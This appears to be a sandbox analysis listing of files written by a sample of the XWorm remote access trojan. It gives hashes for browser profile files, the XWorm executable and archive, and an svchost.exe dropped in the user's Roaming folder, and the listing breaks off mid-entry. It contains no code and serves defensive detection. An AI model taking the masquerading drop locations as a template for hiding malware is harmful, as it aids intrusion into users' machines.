SHA256 f1d91ec4a1aa3ee8bb428a4ffd9ab7d59afa69fcf89768e76e54e90dafe20384
SHA512 1609dac3a1f13e5874d39bb1ee9330c8125f4f422f286e3be4a94cb6642802c21df8f1012ec1a6d0bf281a14487cc52fd46bb2cb343be7d91892b6fdfefee35c

C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Network\Network Persistent State

MD5 c05680b0d85bde153702f5757a1881ab
SHA1 ad4879b4e88f1ca31e221806380a78208d0d9502
SHA256 e28f596dc63ca0d7dced7fc67ba233e405a63b513d19604061ceaa2dd4ba47e3
SHA512 d1b5bddad5f59f8eb84fa850e9119bb51850bc549fc007eeb439af56f9759fb73a2da82eafa96eba293528e85cab886c7e34984a81c1398532c86ad2e7714887

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 487c50a3d57da6e13c6c6189ad49cdf9
SHA1 8b7404f365162444ce6b2c356567f89fe5ad25ef
SHA256 12a0cd034eac5585da9c8522f7f6962f747307af8d0fbe6024db0b1e39237f73
SHA512 3b9e0ac0aaa56e7305fd86e6218c9da96db02acd76512c107656f84a5f5733ebf333770f52c0b4b6c8c0cb2624ab74768deaaeb7c106050af84ac44593b6f918

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 aefd77f47fb84fae5ea194496b44c67a
SHA1 dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA256 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512 b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 d3a34e57e84c51a05ba3a2fc399a6efa
SHA1 bdb47ffb0b15a5009b1526291a2a22761a4f9b65
SHA256 0fa49adbf4719e151d00b04b90bacde8e139b2d0a3497a300d90fb3b3568103f
SHA512 51e6635eea2b7c81296ed8c5884c61e40d0046551fcddf33612a7d137f1c36362f727bdcf26b0fb23707cadecf09f75be5eaceb08cff211f1b0297ed46cfd681

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 ef4ec162f9c141a98693b6d98f6d65a9
SHA1 893edcdc55dc099926b145fe4a8a0284b6b91824
SHA256 ec03fab4238bb018f5dfd4d0b069430bbe6a9eca2eed75f6cce1e32c544d06d5
SHA512 49a7d89acf700fdab4ff6ae598708d9049c49adb24093fe05e82f276da30b51416599b9d67ad1b10c542894333ac19bc87ab7826ea335fb6cd25642ef71aa7d7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 6c73a8716c59cfc1719e655b6e2a6112
SHA1 05e9b18e72680fb64a456b5023e6f4aafcd1273b
SHA256 2b0cf9761af95e6cb6734d606869179fb408c8bc2897eebf9fb569b3fc972a74
SHA512 5066e137828bc807d5d3d23e92009fe9f8445ba4908470b42e22168e46bea93b57ef19600076c12ed0599495e3134c8b78d4f8ba94e0e49280e18db4a904cf50

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 0f72b3182262e326ecb6b058fbc1067b
SHA1 c6fa80af486b23e030f9d2754d1a311c85ab3b66
SHA256 207e3a397484771eb7ae7d1d4ad4dfc3d72697a80674eeea7fe865db2658cb58
SHA512 a48831754ff66beec5639b5a258bb4dcf64ea1d796e7880aa17d93d1524d7dd11d24d89ecde01d291022e134a4445ff8b47d0d37567041c80680c6d718cf469c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 b7acf7eee9e2f16e42da2b3afa881c06
SHA1 88ae41b56e12ec1d909abab9f32d2fb519ddf580
SHA256 9aa8872de31a8524af41252b59dc10c0b5a83da1669a3acd95e0761386b5877c
SHA512 64f4e05f752129601e42e53056082b3b0fa21d3346686baa629a6701e4a4f649b193a56f66f62dc7c108400ade4be00ffbc9a9beab0c1eef347965da70df4982

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 a62c8895544fcb0ab42fb29bbbb5c543
SHA1 38dfb878cd9da7775ffef490986c980cccb774eb
SHA256 7f3e7d7190e94811f8509e6fa583063f52880779b2247d963393ab9c200af791
SHA512 085fa64c5657a7c8c03aaede7b60e0d0b1ce745ec03196c356de376e9a2bb5f5d64fd4cd973008d843c6ba0c075c8df4aa22b32bfa3543b924d25568d11a2cea

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 19d703071c38042864ce2c659e24526c
SHA1 1573ac8a3d7a039ad196dfd4708f576ddc19d7f6
SHA256 0d0881224c295552155f04d27555147f19d925b9792a53b956793ff449aac77a
SHA512 246ea3759a1870cc832cbf60724e3ec0f16929d778e709542128c7a0f66c6ca52231a7f3e1c7e633bbc697d9ed8fc3ee82891fbda2573b49690bfea60d447679

C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Network\Network Persistent State

MD5 0b6ae2482206eabd98184407d4812b24
SHA1 9499b92cbfd52593552b66bce42053a7715cff24
SHA256 979703a7f53a7ee08efa6ba510651464335b8c22e7a608692609bd156918eab6
SHA512 aa234215b9c229c88c41921bba8be9ea7b7603ad4ac5f8556f1378f549c487902cabf9cdfd758de531b26ea8f8ff1c32626ac6a879d15feac1e4fae2ef57e597

memory/836-1864-0x0000000000E20000-0x000000000152A000-memory.dmp

memory/836-1865-0x00007FF990C30000-0x00007FF9916F2000-memory.dmp

memory/836-1866-0x000000001C150000-0x000000001C160000-memory.dmp

C:\Users\Admin\AppData\Roaming\XWorm V3.1.exe

MD5 37a9fdc56e605d2342da88a6e6182b4b
SHA1 20bc3df33bbbb676d2a3c572cff4c1d58c79055d
SHA256 422ba689937e3748a4b6bd3c5af2dce0211e8a48eb25767e6d1d2192d27f1f58
SHA512 f556805142b77b549845c0fa2206a4cb29d54752dc5650d9db58c1bbe1f7d0fc15ce04551853fb6454873877dbb88bebd15d81b875b405cdcc2fd21a515820d3

memory/2808-1885-0x00000000002A0000-0x00000000002B8000-memory.dmp

memory/1372-1884-0x00007FF990C30000-0x00007FF9916F2000-memory.dmp

memory/836-1883-0x00007FF990C30000-0x00007FF9916F2000-memory.dmp

C:\Users\Admin\AppData\Roaming\svchost.exe

MD5 f23f6537464f47132cee7632b95daf28
SHA1 1981d5d8ee8e600c613b3c11fdff435172ca725e
SHA256 32824c331cc98500763e67b45e616d9b0f5a63f21b87439d18feaac7b35785cb
SHA512 d58575008b8358c6546f7605d5da27c2fd3578240d679a608c5d15950ce809c0af00dff0b989514a2f3a08e30c697684dcec7695ddbba659e2fa0811280a5a80

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zvgklhg2.izc.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 2fc9e110688386f553ae9bf31219b3b0
SHA1 89ba40813cb0a5efcf5574ad174f1573ca4d5e96
SHA256 d242a64927ce6db904ab31a13c78c87fa41c9c0f2b9c7e6c3b40b50c18cf2e37
SHA512 2753aa34f6cb357984ed3f88107174bf81f4bb6513dbacf7373eed4d281c268c2925201142d59f60698072d00b0a664199fe449b3055244e7f2a471305253bec

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 0dd15873132d24d04ffa1a263651de59
SHA1 4e3ef0039280c5887607f50f2e7537d4c537691c
SHA256 2ee3858d9fd18661f0359f85f37cb3e264a9f273567d845744decbb4a91f6ff6
SHA512 912444becd0be19d44333a5c625ff1e921151ea3c2eb7b9df45f8e2bf03501c096398361118702279519fcf8fa645666734d37fe6438f1c3ad291c0e23c4af81

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 b9fb7f45ef5b851359c423cb9f0f674f
SHA1 877494509eadcfb3697b90993ccce68a3cbbf05d
SHA256 34bdfa74d51db6f48d1ee14386b048f23428b9a8ea1648b885e07502c70c363e
SHA512 49850062d1cad73b120c3bd1963c0ec4ba14340b7527a9098f5f5da13b01f347945ae8ab514b52218d4448dab6fd694d14fa2590d9b48d303425866f508eb037

C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Network\Network Persistent State

MD5 98ba8fadb40473d6e96dc8c13486be6b
SHA1 82c7f83a3dc7891487167f4718dc6dd111cb551b
SHA256 d9264b150c87cd96978a005cb97fe8226c42072d55cc6ef8c2105f11bcc32f7c
SHA512 2049aafe24022d2b3933702089f79d056c8e8a5ca6d2cb9591b3aa2645f58a6c3ba511f5035c35de9358ebdc7ce1486e134004d3e6afd87da80a21506c0781f4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 3a1f3a78686ff36480d9874b474c64f7
SHA1 160eea8b5c60b2cea0eead7b96bb995667c2901e
SHA256 34652429ba21b37bc0c1bc881926b696886fb9e32c2112a3b9d5ab6f38829bf9
SHA512 f61bebe70bc63edf3bf72f155ff88c5b90cc60b734687f797a001254d2cd078e0b85c3acd0d3f586de579f64d7dc00c877ad3f6ddbf2b3b685e9dd0b7e8b01f4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 2cb051c72fab87f21aa8755f97290a29
SHA1 acea95aa4d410ff1cb4a00d889f131b6b081ee5c
SHA256 78695876341db0bff5958416af2c1b017a46f38c3c9d7e0004ac7536ec50cf14
SHA512 bf1facad2caf58a2c21e80fe386cacae00df5e2afd160619f7bb204f81380fd2c20ed09e15846362b690d64fac89a4981f69fd21420ea0a09f8ea8dc108d6041

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 d206c39d581388e083961b8fe5087f2f
SHA1 eaac9ccd93014ad1167f96f948ee1112a8e273e4
SHA256 3ae0a8eb3c791f3d6bdf767eb635f1e0c252031f3c69bd233be923bf07d73128
SHA512 0b2942e2d14eba6d41a97308cbed1f664c9bac97c6ef9666b916eeaaa2104ede39d0fc9b6aa04501cdf71171b30b8e1de96fd9cc1573e97846730493ebaf8c55

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 d7b4f34c5102c38ad83658ed7bde51a4
SHA1 618b91e3de31a6f1fcebc67cb66a2100d5e53582
SHA256 e339d856b022027fdfcbe376280e68e24a395fcdb7a2c73dfc96964a7fbf7932
SHA512 80f58c20a0bd41e48acff6b867de0d8a6e4405b8021396033e6071d2e1268d58894cb86d63efe022a95caf65d93c46cda3e31d497bfbb4f3caf8b24df8067d86

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 6ec45fcdadb37e1c09b9d9d519fa1529
SHA1 21ff52d181a54891bdf5af964b2ebbaefac0d1df
SHA256 abe1b04f25279c834a49e164d1e74e1e8e126ef3bda8b3d93287a045444d6a1f
SHA512 84187a045cf9cc4f76d4fbe33c9d0d45d3648c22d7fac1e977599f7038807e6a35600d8069a207f441785a560d03f1ef13d866cece709238ef8fe3de6729db81

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 9990335ab856817d460d01eeb35143db
SHA1 d5862dfc199cde029c1260e1d72eafcba76da0d3
SHA256 1641b5d51b6e914b13daeb4bcac377f9894d829e63460fecdb7603ce8c633eb7
SHA512 ea1dfb74b21799cbb91e5814241731e0ef9533904b61222f5ca83602b8e9be9f544f8c8a5424250c3da46c2c6a098418339f4bc8f067efca6a040bdb768d12fc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 f8461123eb29c4f2a65ae370e57085c4
SHA1 f058e97ed6c251a91da3ec57f183dedc94d5439f
SHA256 b3ee77e68d749919d3ff1619f22a4c3bc6b05ee86c2684474cc13c0f98e03c1c
SHA512 f06b471a660d8950909a91e8b2ebacd1f87fc1fde2e6c9ddc2e296ea45c87bdbfb739271fa23cac55ed43500084a57519292767952ecc7f24709e288a2f0c810

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\eb5a38eb6d74971f_0

MD5 101fec33f560fa923de2f7a0572abaf8
SHA1 15e8538f6f5b1a2871e1cd2413789a88a1e42bb7
SHA256 85887d1748ce9e0423f78fe3f93b8c7cae81752c6a21c9065a64d6d1e5ff39c8
SHA512 7f784bb4923ede7ea10858eeb7c360ae0a79a924096d432ff20d0df3d3a3c373d35a820927c1d09c245b30a26bb7500f23b3150aa8f0e64429a1449172161781

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\20f6bd3fa48d5b7a_0

MD5 8ee5e7fad62c0277f4842ca208880b82
SHA1 4502b091f1869a002c5bda1d3d1bf120d3a6d9d9
SHA256 c4f3a2ec9371f56b76232c36fc126be32d79b3e07c2bc342bf2b796f81ce4c92
SHA512 03ade4db66080fd39b51fae44bc4e64d320c4d69389d315bfd23ed63e17fd6c271a9ea67a93a854bcf27646445121782fc8373406fa847d227dcfbed34e724d9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\4d04044bfb8f9703_0

MD5 a307c8ddf4c8990dc1c75a4c67f8aa5d
SHA1 afd8a3ebb706563b09256e95e7f5fcfca1785223
SHA256 7e90cbdcac73f692018d2e4bef6e4dffe86f4e890f5ec6e9feec660c6c16aece
SHA512 3456dbaed4bc326ae359f08ced6ec758a2d9717954d59c9f6d3f665992474663b860bc5d3321f52edeee54aa8289f8f27ddd0caee69a40002114217f7a2db7a1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\26cd902f6ec57e12_0

MD5 49aa74bc470136c7596b582cb1023c6b
SHA1 04723b757ae72876ba8655ca69fb5b3e34a2346e
SHA256 15a6230a191c1bfa8c55019b04a0f7b0138a5df24cc05235ac9085e397268820
SHA512 22ee7639042f7158496e3ed6c063ca5a3d22ade09dca79ff79affb1e6d08885eb4e60c57897df9971438504297153ee2d1b002be4607077b95f19030fc1199d0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\8b2929d923d98769_0

MD5 5256c1009d835c71dc7be230de07eb3a
SHA1 2352c7dd03048ad878b580e575582842ebc2ef33
SHA256 7ca58282df014c2de4d6319f9fe47054a73637444bf6baade9c2f7e4861e24c1
SHA512 5564489fa59f47e3b9138b2ecfbad8f0c6cf8840d1ecc48579c22a1afbb4e34d4eb964aefef8a5d8745c8782a4b57fdc74cadd1382527f9b2c894c2cfae90bfc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\0debc5fbf5dadca9_0

MD5 3c9b0c077f77d9a6e4b6fca28ae6b603
SHA1 bfd1b951b9270904623ede7551b0300b6bfd46a7
SHA256 54369152c15ec36c1960c3d090926f8c565dea1ca06cac7ebef6e7ebf43677b7
SHA512 80839e03755bdeeecd6206b86d679ab393be0acc17e0ee6e2bff5ce94e532d3874afe52a0ffd8e44638ff177d839730cc06bb5c9a64333c7038eddf3400a1a5f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\2501308e6cfb93d6_0

MD5 f49781b6e7b385e49029af693dc1304f
SHA1 cbc6b8252596a9729d5a5160a0da8ab87c6c409e
SHA256 2923d4f5f818a8357f66f9ff933348393f6448a37145635c341405bcd27d025e
SHA512 872d4448a173162dcc2a216f959c62053ec6787b940b042d1eba50e949802b5d49b7500a5099b623fd32453a47fe04fd2f5686b59cac8e676a90e6442f63fe3a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\ffe62a08b235c1d9_0

MD5 31d6448fa95108c092cde31ed4aa5d61
SHA1 30934831bfc104189408763d079ace69e341cda1
SHA256 6e31259ff974584a07510f79992b19db653f8669a02d91c2f069d271d3b50559
SHA512 724801d59b246309e0faa56a9fcbf5e0119a4c20071095ba0836470540b164183a666244af5ebec44fde8995b2423924b361a96c42ff7289214eb13ed5cac372

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\5d8ec1bc548746d5_0

MD5 c6a62c1534e96cd0ba897f17b7f82272
SHA1 fca11abc6cfa67720782e9afb4cf0a1a97e32af6
SHA256 32d728cdc98b960ca8ade5e002bac89348a5f247ce8a201099b3615cad41976e
SHA512 1ddbee12b0d32e652f624c0785c78a022eb5e341ddcdc15b98afafb5a939e70092e84c756cc0bcc4065a519ededd07a1287d8981444a45fc009ffe82fcb85ea7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 0348076ef3cf027c94b7e4b50afeec3d
SHA1 5ffb97188b6c56112d1358418c6bfe99b2830469
SHA256 bf0614e0eee5d777cf0fe503eaf6ffccdafceeab30dbe6355ea0463669080795
SHA512 631be02a2943629755f2320bd6981d19f9013f12090304db3123835485ea41059042b01af9d73bc92adcc610a4b2106a17960041c4ac645bd32322112652a9eb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 4a2659ded74630a59534b1ee939cd92a
SHA1 b5be65e002464a5efe70ff2fedaf85f3ab97430c
SHA256 da9792ae4665544f773fbca52a64e7ded9d831cf43ea8968f3f39fc352d93a57
SHA512 008d48246e2c668dbc6b24e76ea37a4087fb66b0b4b5f2443b01c7aa6e3a34bcd077bf1779021f93b8af0205f66354c3e350226a40965bc7e9ba094931861959

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\cf937100869d08e9_0

MD5 aa0768ef861b6fbcdd6674e0a07242ef
SHA1 66fa9a6ed25a044ebe164ca4b0f7d3f9b6b813c0
SHA256 3a89b7c4c3ddb2c753f5d6e8a45d0fdeb0548c538b5c710cbf53b4e7230f004a
SHA512 0359487726053d9fdf30ecd5f53ddf39a43943932262def456ba9106c58661f9dd4456b3d16594e5d939f7fa8c84c129c673ecd4dce601586e2b857b20aaed56

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\093c2bbfa743dbf2_0

MD5 b15caf13d9eead8350556098b0787323
SHA1 aa5f2476cd2f02d2327aedb3785fe3116a68a6c0
SHA256 e28494a810b738076ea81d4927b3bba9732f9d427eb40a710961ee109d797378
SHA512 b7d6f2d684f20a5ea58ed1c4a3a5aaaafbe705c8b528a862e3f081bacbcf62a65af7758bf219cbb043f2c67ac390ca42d2bcd6bff88e39b272aa8188b160dc27

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\27e087ae1db041bf_0

MD5 469435d494f6fdc79ac25e586216d744
SHA1 7cd97bc9ac163ef3f9a1e217f87de919a90fcca4
SHA256 d5a0f837bc925bed20469c9da527b4580ec4ae136bcf935d9ace9fd231fb5a02
SHA512 b5042d48a2abc02241045142f92f86e451a3944246b366e896fedbb0deda1c2386a2ad84d22cea2211df4d291e32588d080cfd807df80ed753bc67467fabda25

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 ebe93d473eafd8f3366708a3ee3f4d23
SHA1 0da1939fb75e50069fe60048317cd1eda09851a2
SHA256 a203fdf6a2e1e564f85197170cb8a2579a817c0cc0dcb1d8ca29787a469f4e14
SHA512 bca52d2d54166e437dd67e4bc09ff996fde60ecf7d5b1be2821dc7c70d1aa7ac4ed8854c259df41b0648a4c420ccdaf58b6368c09f978833b856eb33f41b8387

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 8752f78686f49746e8a6b753d785e17c
SHA1 5591f6f9fde8979eda29649e06617a96d2fdad95
SHA256 3beae194357c22c4b71101e5193fee3ba3595bf1ef2ce0b1013a5f5470d9925d
SHA512 34b3a3135a35f465c37dcdbb1e4a050d81a2c515c6f3ad210323ef14a8b84fbb7151d25a3868733d243b16966a0e28bfdc66e8800cc37fb2c4ee4a3a475ced23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 cf82f84e46c80cb427187c7ac10f8e4e
SHA1 5f34b312dbce4107fd158a797eadf23d741754c0
SHA256 c530f2ee72b95452315c3c18ac7cc78458d94244bd7acad855663c72eae16319
SHA512 c7a51320cc49cfa6a082596805ba8acc4db3d7ac8a8fc07876fe3df60154cad79fcda7503ebccfb7fb819417853170f30c925f5aa830c2c141692842363b8ee7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 72d549cdb80c143b7d146f0421d097c9
SHA1 48526793e4613c7f25344331cea1992ed46742bf
SHA256 061d3a4baf51b09685fccaf55d246ec7f005cb4cce2c99f0e08dd8e82176f168
SHA512 90de396e8be4bc8ef4b0ba5e949788b3f7aa20b0e10ab94aa33544d3bb6a27bb6750af5797ab17be4b7ff9f32d717f3edd8f19486022fa7d286c8aa87bbd19e7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 2c1f236dfe161aa30a3164c97a434489
SHA1 a18ce8551cc431bd1aff599494436c4a74e09ac2
SHA256 749a44692a757caa1994d8cd174f9bcc4fc2eb38b9aee8cb158572b7934a0192
SHA512 7f0d47cc6f0ba4f58446ccb2551ad53545bcda6d53bae4dcedc6acd04c31af0899143db04252aacd60aa42706bbaaf5b42d8b4e3da6cc2f2f584acda95150391

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 fa9f26904eb30b7893f16c4671316417
SHA1 feef30f8863a0bc08661a9dd7810b3b589dc9ed2
SHA256 6e75b0119771d0aa1b9425dcbf52d777f5e2ced2b50c0cf717458ce633b03719
SHA512 7000d855ef043158f8b805d347d637a32383391a3f9947c331dee1379bc0118155c48efd2e693baa6b2f236d9d5556b03f9a153abfc1f357c656140959d8a7b5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 84ebe621dac680f04d485eb31e56bbd3
SHA1 d56625ae726b194bf1b829aa5c44d46d28015766
SHA256 967807a5c8ec7ca0e3d1f1df459937c763256e2488d5bb8f698e64574d4319e5
SHA512 67d999b10980ee029f872a15a5759456c87270eddb9620af3460c8d9202d1fa67120eb36438013129bc0de8f5fdf593cfb865855b5e92b6ea4bf41698f42121b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 47309c14ed9070ee71bc419e9d6544b3
SHA1 2b2a8124ea71bcb218cd47ce15aaa3dc36cb951d
SHA256 c3661fdee0c10dde771da75e009946369efc20bdb9566c691809c1e1de6bd085
SHA512 cb55068c53d2be2ebac7d06b8cf450f754a36ee1e1053b87d4186733f43aebaaf6f90f81d62ef66ed4e4595ae32781acb1d6647074d157ac5e7e0d0bbbf1d0e7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 2cd8294a62b12075555d8ba7e7569ffc
SHA1 514c11028aa29f1f00338993c8239925a5867997
SHA256 e8e7c9e4d3203a27ca8e5f3f07b80039ca212dc1b1f309041252e5d0d959665e
SHA512 fec4a4f23bd2f943ec29be6ae445923a61d7d1bbced9fc8c69af3e86ce9ffd6627d35239ed4b16e0001a97b8719f6cca631ec7695992c52e6828b967fb00607d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 8184f4fe7c3da17208fafbba2421c4c2
SHA1 33ffe2c2784dfa9ef251321dbc85d768da139e14
SHA256 f4f7feb1e1bf1457a7b4e7812c5f5631d072dd0df483e6b5c6caf792e0266130
SHA512 516487e151b453a53b31ebe4c7e9f00fb8e1c59dccf109304bdf4ad372528a98cc49e8ffbf933bf45e2675a7eeba60a7447c577d4de5bf511c2a75dec2cd9ff9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00003a

MD5 9ec7dceb8c749a75852eab1e2870704e
SHA1 118df18e954ac58468ea0e49a42ea54014769408
SHA256 4bf8610a3bf59b622143f07050e323b17a901d652f7c98ef56a191cb811d825c
SHA512 ea68bc63365e9bdf603d3f3a9bb28a44448b8f4a6e8411365b4eac2cd77b6d3e546a9e9fd6161038ab70556bf0aa2425f25945169b67be4ed55ac1daf51621fa

C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main.zip

MD5 7f450666e9781393ff2c69a06e362939
SHA1 2d5eeb308b6e687a3c5acc182572ae398a058f19
SHA256 973de3e5740ae8935a9d001e60dfe3d12e728009b7e5283116627dd6465d5902
SHA512 a8ec01ea493a8b91d0b09a9bbe70e98a90fcd8e2c4cb0e0f2fa142f38fe24c5557be754fb2f353de2b0b7c83ac1a17382a6731107cc635072b261691a549d15e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 f75b71e65261d8f7d8067fecec5757b1
SHA1 99f9242c232eb91a1ce9c7d0ac1938475262ab0e
SHA256 a683742a421f15b6afe7748fed135915eb5002dc59184089088e9f10c9e911ec
SHA512 97fd9704f4a02baa1ce6ea43f75db35ddec77c853a53a1a209cd5438aa25a6f1060033740bafd8ddf07bc3ef396c65d8506960a29e75b6c6243f78b0e3b58f5c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 f4a8e89b97834504463bac3beeea6a23
SHA1 afa08eebf16c8b47db7e262fdbd9c96e0663dc65
SHA256 751f0fd0e6a257a1fbe99eebb5ac2c8e0f009fac37c1092d5b103774cdfb856a
SHA512 4819ead7816bf8ef31ed965e1eba4b965fc720e52beb9d0059739b80f73f4a443a1394a820893190342b0c9701bebe7eec8374b3adaacd7e269a64f580e3ed73

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\180e414f012d8ae3_0

MD5 a40d94301fbb1d20ce9f592980acd9dd
SHA1 19128fa468c0e9a341abe368421f4ba1c121b41e
SHA256 d6f0120a04dc1f3d7bda8c905354886da837365a8ab72b5b5491f8b08f721aca
SHA512 93f0367e5b84f17e4fb74c0dba94f0765ff289b65059abfac444e79e3f546bfca725607d067498ad26c8e528fd3adbd2414ac850c1bddf6259e86768166b9b7e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\600f2ddd54cfa320_0

MD5 b9082dc5a604ca19534d0d633ebc7985
SHA1 55c990840cdacf8846121cd40631c26f6c8967df
SHA256 70aa0c296157d59f6a7e2f8ad8f8755140bba0e71aad0c0881de696220963922
SHA512 0b656a3e90f810cf756642f4b0a6df93780eebc5090033aa0895261260cdce723be5abcd9d6d71fee4358f98e1eac20a5f6487a935dace9f54121fcfbdb3b3ff

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\ca5b8db230134375_0

MD5 9fe0fbfbf3cb48b19e90baa1c2cd53fc
SHA1 6805018f20c98a3c23e474aa69c0152b6e46b194
SHA256 3ddb79717f092e703d4dc3f4adaa38d1d13a6dfd1ebd1ab8308471bd0cbd0b34
SHA512 d4d2f0e89925dcd8f0bf6ab7f6aa86c278dc110397f9438d40c8b9d34777e53e2b762deced7fdb5b3f7401da9d931af84b80e85b4dd6c2b77a41172ba50a2a65

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\0e1cc0aa9a9c464a_0

MD5 eb58abfe85764b3065595869c9d63d7b
SHA1 c6dd458bd893226ce78a2fc22fb200cd3589fa17
SHA256 5360dca37960b6d3571670b9862bddefdf6a398aa2a127c4779b7cd90ee6261c
SHA512 8d1f181e8c518e0ca273c6707cc2c287cd071a55ca6892b7512a921492f19f4db5a76e68c03fbf7c75d6a5ee1dcf70c6ba87b73be3e8fd3d256898d64d501bdb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\2c3dae2387cac3b7_0

MD5 2dded1f8f7d01a7c35e3688e577199e8
SHA1 d469d5ef1369e2b9789e3c519fd6a1b58d005760
SHA256 553d5444dc9e7ed66f223679c6e3e57f0eeb12ef19850877736491ad4a5cfb5d
SHA512 0f007381250dc40ea248dcd4a0e96979f5c90f12824843b5114bd3f910719e7980541292c1a8d8141a9197e8bf077856e0064a7494ce066c66aca6957f8ef776

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\5526e5d56b1f071f_0

MD5 4a26200ccbed99c7066d827aaaf8983c
SHA1 5e5f220376fd97bba05ad7d13f7ea5891a121ab6
SHA256 405c895e26e3f3ecfba90d413a849fc80555faca33cb4c15a4579994578a9c10
SHA512 f41fb72790ce5eea04fbece671df9a46a30a805b40612495b1771c0818f3242b03c0c59856e78ca37e4c9356b9234462bc3fc21a5c6afe5d427cbf0d927b1020

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\4944e26945802309_0

MD5 047877f87b8844dfa6d4db83baa12df1
SHA1 c09c48e888b391c966036c4a71f7eb656da5d321
SHA256 23402b2aef55061cc083f700415b7746d2fd943e5e5e2b613eebb4ed0d2d7847
SHA512 104d3ed31624b3782ba80c0df69262c9467989dddb65a99cfccef1682c8715974e823f027c7ac0b6c45738834c56b261d0ed53eecdea8679bf329de4f8495d67

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\d454d3e8f372d3b9_0

MD5 58d4d6087858e9d31b2d12bebb52f0b2
SHA1 59e58c07fc2043e8f8e1eeadf47976430d775347
SHA256 867e12b964aaf8f6d15757ffcca0421955110d0f68da825fff49f6799a85645b
